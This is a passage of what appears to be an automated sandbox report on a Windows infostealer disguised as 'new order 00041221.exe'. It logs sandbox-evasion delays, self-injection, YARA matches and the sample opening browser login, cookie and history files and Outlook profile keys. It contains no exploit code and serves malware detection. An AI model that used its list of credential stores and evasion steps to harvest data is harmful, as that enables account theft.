Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595547 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595433 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595313 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595188 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595063 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594938 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594719 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594484 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594374 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594266 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594156 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594047 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 593937 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 593828 Jump to behavior
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<5
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\new order 00041221.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A397B0 LdrInitializeThunk, 3_2_05A397B0
Source: C:\Users\user\Desktop\new order 00041221.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\new order 00041221.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\new order 00041221.exe Memory written: C:\Users\user\Desktop\new order 00041221.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\new order 00041221.exe Process created: C:\Users\user\Desktop\new order 00041221.exe "C:\Users\user\Desktop\new order 00041221.exe"
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Users\user\Desktop\new order 00041221.exe VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Users\user\Desktop\new order 00041221.exe VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\new order 00041221.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\new order 00041221.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality

Source: Yara match File source: 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR